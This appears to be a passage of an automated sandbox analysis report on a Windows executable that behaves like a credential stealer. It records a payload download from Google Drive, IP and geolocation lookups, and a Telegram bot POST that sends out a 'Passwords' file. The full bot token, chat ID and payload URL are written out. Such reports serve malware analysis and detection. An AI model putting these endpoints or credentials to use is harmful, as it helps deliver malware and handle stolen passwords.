            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31ba864dec1bHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033620000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033418000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033687000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.000000003347A000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.00000000335AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033687000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndn
            Source: 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033620000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033418000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033464000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033687000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.000000003347A000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.00000000335AE000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033620000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033418000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033464000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033687000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.000000003347A000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033211000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.00000000333D7000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.00000000335AE000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: 4NG0guPiKA.exe, 00000003.00000003.2534442338.000000003593A000.00000004.00000020.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000003.2535110056.0000000035940000.00000004.00000020.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: 4NG0guPiKA.exe, 00000003.00000002.2624347015.0000000002B17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/~
            Source: 4NG0guPiKA.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: 4NG0guPiKA.exe, 00000003.00000002.2646464794.000000003347A000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.00000000335AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram
            Source: 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033620000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.00000000332D7000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.00000000333AE000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.00000000332EB000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033418000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033687000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.000000003347A000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.00000000333D7000.00000004.00000800.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2646464794.00000000335AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: 4NG0guPiKA.exe, 00000003.00000002.2646464794.000000003326B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: 4NG0guPiKA.exe, 00000003.00000002.2646464794.00000000335AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065
            Source: 4NG0guPiKA.exe, 00000003.00000002.2646464794.000000003326B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.orgHI
            Source: 4NG0guPiKA.exe, 00000003.00000003.1624599289.0000000002AAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: 4NG0guPiKA.exe, 00000003.00000002.2624347015.0000000002A38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: 4NG0guPiKA.exe, 00000003.00000002.2625334831.00000000046D0000.00000004.00001000.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2624347015.0000000002A71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1vX5-dVBAQIFbZDndDazNJs-9Am6tnDXt
            Source: 4NG0guPiKA.exe, 00000003.00000002.2624347015.0000000002A71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1vX5-dVBAQIFbZDndDazNJs-9Am6tnDXttou
            Source: 4NG0guPiKA.exe, 00000003.00000003.1660792634.0000000002AAF000.00000004.00000020.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2624347015.0000000002A99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: 4NG0guPiKA.exe, 00000003.00000003.1660861517.0000000002AE9000.00000004.00000020.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000003.1624599289.0000000002AAF000.00000004.00000020.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000003.1660792634.0000000002AAF000.00000004.00000020.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2624347015.0000000002A90000.00000004.00000020.00020000.00000000.sdmp, 4NG0guPiKA.exe, 00000003.00000002.2624347015.0000000002A71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1vX5-dVBAQIFbZDndDazNJs-9Am6tnDXt&export=download
            Source: 4NG0guPiKA.exe, 00000003.00000003.1660792634.0000000002AAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1vX5-dVBAQIFbZDndDazNJs-9Am6tnDXt&export=downloadq
            Source: 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: 4NG0guPiKA.exe, 00000003.00000002.2646464794.0000000033241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189ec
            Source: 4NG0guPiKA.exe, 00000003.00000003.1624599289.0000000002AAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: 4NG0guPiKA.exe, 00000003.00000003.1624599289.0000000002AAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
            Source: 4NG0guPiKA.exe, 00000003.00000003.1624599289.0000000002AAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
            Source: 4NG0guPiKA.exe, 00000003.00000003.1624599289.0000000002AAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: 4NG0guPiKA.exe, 00000003.00000003.1624599289.0000000002AAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: 4NG0guPiKA.exe, 00000003.00000003.1624599289.0000000002AAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: 4NG0guPiKA.exe, 00000003.00000003.1624599289.0000000002AAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: 4NG0guPiKA.exe, 00000003.00000003.1624599289.0000000002AAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
            Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
            Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
            Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.10:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.10:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49712 version: TLS 1.2
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 0_2_004052D3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052D3
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 0_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040335A
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,3_2_0040335A
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeFile created: C:\Windows\resources\0809Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 0_2_00404B100_2_00404B10
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 0_2_0040653F0_2_0040653F
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_00404B103_2_00404B10
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_0040653F3_2_0040653F
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_000D43283_2_000D4328
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_000D66B83_2_000D66B8
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_000D90483_2_000D9048
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_000D19B83_2_000D19B8
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_000D5F903_2_000D5F90
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_000D89D03_2_000D89D0
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_000D2DD13_2_000D2DD1
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_331E331A3_2_331E331A
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_331E53923_2_331E5392
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_331E03AF3_2_331E03AF
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_331EC6383_2_331EC638
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_331E76283_2_331E7628
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_331EF6483_2_331EF648
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_331ECCA03_2_331ECCA0
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_331EE3393_2_331EE339
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_331EEBF73_2_331EEBF7
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_331E6A433_2_331E6A43
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_331EDA893_2_331EDA89
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_331EAAEA3_2_331EAAEA
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_331EB9443_2_331EB944
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_331E69CB3_2_331E69CB
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_331EC1F23_2_331EC1F2
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_331E69E93_2_331E69E9
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_331E78483_2_331E7848
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_331EF0423_2_331EF042
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_331EB07F3_2_331EB07F
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_331EE7903_2_331EE790
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_331E7E1E3_2_331E7E1E
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_331E7E3C3_2_331E7E3C
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_331E7E9A3_2_331E7E9A
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_331E6E913_2_331E6E91
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_331E6EA03_2_331E6EA0
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_331EDEE13_2_331EDEE1
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_331E75103_2_331E7510
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_331EBD883_2_331EBD88
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_331ECC8E3_2_331ECC8E
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_331E748C3_2_331E748C
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_331E74B13_2_331E74B1
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_331EB4EC3_2_331EB4EC
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F2BDF03_2_35F2BDF0
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F29D103_2_35F29D10
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F296C83_2_35F296C8
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F286503_2_35F28650
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F2A9B03_2_35F2A9B0
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F2A3603_2_35F2A360
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F2BA973_2_35F2BA97
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F2BDE13_2_35F2BDE1
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F24DB03_2_35F24DB0
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F24DA03_2_35F24DA0
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F225603_2_35F22560
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F225503_2_35F22550
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F29D003_2_35F29D00
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F274C83_2_35F274C8
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F21CB03_2_35F21CB0
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F274B83_2_35F274B8
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F21CA03_2_35F21CA0
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F26C183_2_35F26C18
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F214003_2_35F21400
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F2AFF73_2_35F2AFF7
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F2AFF83_2_35F2AFF8
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F2AFE83_2_35F2AFE8
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F267C03_2_35F267C0
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_35F267B03_2_35F267B0
